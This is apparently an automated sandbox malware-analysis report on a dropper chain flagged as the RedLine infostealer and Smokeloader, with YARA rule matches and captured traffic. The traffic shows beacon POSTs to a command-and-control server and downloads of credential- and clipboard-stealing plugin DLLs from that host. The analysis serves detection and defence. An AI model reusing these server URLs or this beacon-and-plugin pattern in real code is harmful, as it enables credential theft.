                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 16:37:24 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytes
                            Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                            Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll7
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllE
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php1FJe
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php2p
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php342a2
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php:dA
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpPe
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpY&e
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpdW
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpe5342a2
                            Source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpq
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe
                            Source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Golol478Ns/index.php
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01377F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,8_2_01377F00
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 16:37:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1

                            System Summary

                            Source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.415154394.0000000000607000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E3BA20_2_010E3BA2
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E5C9E0_2_010E5C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A73BA21_2_00A73BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A75C9E1_2_00A75C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00408C602_2_00408C60
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040DC112_2_0040DC11
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00407C3F2_2_00407C3F
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00418CCC2_2_00418CCC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00406CA02_2_00406CA0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004028B02_2_004028B0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004182442_2_00418244
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004016502_2_00401650
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.415154394.0000000000607000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_010E1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A71F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00A71F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: String function: 0040E1D8 appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: String function: 0050E43F appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01387CE0 appears 40 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01385E20 appears 130 times
                            Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 425996 bytes, 2 files, at 0x2c +A "bmKg.exe" +A "xriv.exe", ID 1578, number 1, 20 datablocks, 0x1503 compression
                            Source: bmKg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 235074 bytes, 2 files, at 0x2c +A "aTaf.exe" +A "nika.exe", ID 1535, number 1, 12 datablocks, 0x1503 compression
                            Source: file.exe, 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aTaf.exe.logJump to behavior
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_010E597D
